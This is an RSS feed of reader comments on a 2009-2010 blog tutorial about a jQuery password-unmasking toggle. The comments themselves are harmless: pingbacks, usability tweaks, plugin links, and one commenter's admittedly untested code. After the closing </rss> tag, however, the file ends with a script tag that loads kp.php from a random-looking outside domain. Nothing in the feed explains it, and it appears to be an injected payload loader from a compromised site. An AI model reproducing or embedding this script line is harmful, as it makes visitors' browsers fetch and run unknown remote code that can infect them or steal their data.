















































<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Password (un)Masking</title>
	<atom:link href="http://www.vileworks.com/password-unmasking/feed" rel="self" type="application/rss+xml" />
	<link>http://www.vileworks.com/password-unmasking</link>
	<description>Web design &#38; development work of Stefan Matei</description>
	<lastBuildDate>Wed, 21 Jul 2010 14:01:14 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: 45 Fresh Useful JavaScript and jQuery Techniques and Tools &#124; DX Blog</title>
		<link>http://www.vileworks.com/password-unmasking/comment-page-1#comment-12324</link>
		<dc:creator>45 Fresh Useful JavaScript and jQuery Techniques and Tools &#124; DX Blog</dc:creator>
		<pubDate>Fri, 28 May 2010 08:43:44 +0000</pubDate>
		<guid isPermaLink="false">http://www.vileworks.com/?p=409#comment-12324</guid>
		<description>[...] Password (un)Masking JavaScript jQuery that toggles the masking and unmasking of the password field. [...]</description>
		<content:encoded><![CDATA[<p>[...] Password (un)Masking JavaScript jQuery that toggles the masking and unmasking of the password field. [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: 45 Fresh Useful JavaScript and jQuery Techniques and Tools &#171; TMHs Web Tips</title>
		<link>http://www.vileworks.com/password-unmasking/comment-page-1#comment-12163</link>
		<dc:creator>45 Fresh Useful JavaScript and jQuery Techniques and Tools &#171; TMHs Web Tips</dc:creator>
		<pubDate>Wed, 19 May 2010 03:22:06 +0000</pubDate>
		<guid isPermaLink="false">http://www.vileworks.com/?p=409#comment-12163</guid>
		<description>[...] Password (un)Masking JavaScript jQuery that toggles the masking and unmasking of the password field. [...]</description>
		<content:encoded><![CDATA[<p>[...] Password (un)Masking JavaScript jQuery that toggles the masking and unmasking of the password field. [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Erato Svensson</title>
		<link>http://www.vileworks.com/password-unmasking/comment-page-1#comment-11810</link>
		<dc:creator>Erato Svensson</dc:creator>
		<pubDate>Thu, 22 Apr 2010 05:10:41 +0000</pubDate>
		<guid isPermaLink="false">http://www.vileworks.com/?p=409#comment-11810</guid>
		<description>I agree with past poster, seems like you will do nicely out right here around the the web.</description>
		<content:encoded><![CDATA[<p>I agree with past poster, seems like you will do nicely out right here around the the web.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Logic</title>
		<link>http://www.vileworks.com/password-unmasking/comment-page-1#comment-11712</link>
		<dc:creator>Logic</dc:creator>
		<pubDate>Sat, 10 Apr 2010 05:00:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.vileworks.com/?p=409#comment-11712</guid>
		<description>Augmented the original implementation into a jQuery plugin. For the HTML just leave off the checkbox, the plugin will create that. All that one needs to do is point to the password input.

Source code, licensed under WTFPL.
http://pastie.org/912524</description>
		<content:encoded><![CDATA[<p>Augmented the original implementation into a jQuery plugin. For the HTML just leave off the checkbox, the plugin will create that. All that one needs to do is point to the password input.</p>
<p>Source code, licensed under WTFPL.<br />
<a href="http://pastie.org/912524" rel="nofollow">http://pastie.org/912524</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Sam</title>
		<link>http://www.vileworks.com/password-unmasking/comment-page-1#comment-11369</link>
		<dc:creator>Sam</dc:creator>
		<pubDate>Mon, 15 Mar 2010 14:52:16 +0000</pubDate>
		<guid isPermaLink="false">http://www.vileworks.com/?p=409#comment-11369</guid>
		<description>@Adam Clark
To code for that. Just have the checkbox hidden onload by css, only displayed if JS is present. Less bulky than having the JS create the whole object and inserting it into the DOM onLoad. 
Good call though.</description>
		<content:encoded><![CDATA[<p>@Adam Clark<br />
To code for that. Just have the checkbox hidden onload by css, only displayed if JS is present. Less bulky than having the JS create the whole object and inserting it into the DOM onLoad.<br />
Good call though.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Adam Clark</title>
		<link>http://www.vileworks.com/password-unmasking/comment-page-1#comment-11366</link>
		<dc:creator>Adam Clark</dc:creator>
		<pubDate>Mon, 15 Mar 2010 10:16:46 +0000</pubDate>
		<guid isPermaLink="false">http://www.vileworks.com/?p=409#comment-11366</guid>
		<description>A useful thing this password un-masking, however if javascript is off then you still encounter a checkbox on the page which now does nothing. I think a little tweaking is needed so the checkbox is created by the script instead, minimizing any usability problems from the outset.

Otherwise a great tutorial.</description>
		<content:encoded><![CDATA[<p>A useful thing this password un-masking, however if javascript is off then you still encounter a checkbox on the page which now does nothing. I think a little tweaking is needed so the checkbox is created by the script instead, minimizing any usability problems from the outset.</p>
<p>Otherwise a great tutorial.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Chris Rault</title>
		<link>http://www.vileworks.com/password-unmasking/comment-page-1#comment-10192</link>
		<dc:creator>Chris Rault</dc:creator>
		<pubDate>Wed, 30 Dec 2009 07:54:32 +0000</pubDate>
		<guid isPermaLink="false">http://www.vileworks.com/?p=409#comment-10192</guid>
		<description>We&#039;ve also created a jQuery plugin to allow you to easily add password masking to any of your sites :)

You can read more and download here:
http://www.prothemer.com/blog/2009/07/02/new-jquery-plugin-targeting-usability-for-password-masking-on-forms/</description>
		<content:encoded><![CDATA[<p>We&#8217;ve also created a jQuery plugin to allow you to easily add password masking to any of your sites :)</p>
<p>You can read more and download here:<br />
<a href="http://www.prothemer.com/blog/2009/07/02/new-jquery-plugin-targeting-usability-for-password-masking-on-forms/" rel="nofollow">http://www.prothemer.com/blog/2009/07/02/new-jquery-plugin-targeting-usability-for-password-masking-on-forms/</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Student Brands</title>
		<link>http://www.vileworks.com/password-unmasking/comment-page-1#comment-8820</link>
		<dc:creator>Student Brands</dc:creator>
		<pubDate>Wed, 04 Nov 2009 18:50:54 +0000</pubDate>
		<guid isPermaLink="false">http://www.vileworks.com/?p=409#comment-8820</guid>
		<description>Thanks for the great info, we hope to use it on our website: http://www.studentbrands.co.za Which is a free student portal, everything free for students</description>
		<content:encoded><![CDATA[<p>Thanks for the great info, we hope to use it on our website: <a href="http://www.studentbrands.co.za" rel="nofollow">http://www.studentbrands.co.za</a> Which is a free student portal, everything free for students</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: errata</title>
		<link>http://www.vileworks.com/password-unmasking/comment-page-1#comment-8130</link>
		<dc:creator>errata</dc:creator>
		<pubDate>Fri, 02 Oct 2009 07:37:41 +0000</pubDate>
		<guid isPermaLink="false">http://www.vileworks.com/?p=409#comment-8130</guid>
		<description>the true is i didn&#039;t tested my code sorry for abaout that.

but someting else:

inserting html code, is not the best way...

use:

$(myInput) = document.createElement(&#039;input&#039;);

$(myInput).attr({
  id: &quot;password&quot;,
  type: &quot;password&quot;,
  name: &quot;password&quot;,
  value: &quot;exapmle&quot;,
  class: &quot;passClass&quot;
});

thats way more OO

ps: sory for my english</description>
		<content:encoded><![CDATA[<p>the true is i didn&#8217;t tested my code sorry for abaout that.</p>
<p>but someting else:</p>
<p>inserting html code, is not the best way&#8230;</p>
<p>use:</p>
<p>$(myInput) = document.createElement(&#8216;input&#8217;);</p>
<p>$(myInput).attr({<br />
  id: &#8220;password&#8221;,<br />
  type: &#8220;password&#8221;,<br />
  name: &#8220;password&#8221;,<br />
  value: &#8220;exapmle&#8221;,<br />
  class: &#8220;passClass&#8221;<br />
});</p>
<p>thats way more OO</p>
<p>ps: sory for my english</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Narin</title>
		<link>http://www.vileworks.com/password-unmasking/comment-page-1#comment-8127</link>
		<dc:creator>Narin</dc:creator>
		<pubDate>Fri, 02 Oct 2009 07:05:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.vileworks.com/?p=409#comment-8127</guid>
		<description>@&lt;a href=&quot;#comment-8107&quot; rel=&quot;nofollow&quot;&gt;errata&lt;/a&gt;: I&#039;ve try your code on Visual Studio 2008 and it say &quot;Microsoft JScript runtime error: Exception throw and not caught&quot; the error is &quot;type property can&#039;t be change&quot; but the original code is work fine. I don&#039;t know that another tools show error like this or not?</description>
		<content:encoded><![CDATA[<p>@<a href="#comment-8107" rel="nofollow">errata</a>: I&#8217;ve try your code on Visual Studio 2008 and it say &#8220;Microsoft JScript runtime error: Exception throw and not caught&#8221; the error is &#8220;type property can&#8217;t be change&#8221; but the original code is work fine. I don&#8217;t know that another tools show error like this or not?</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>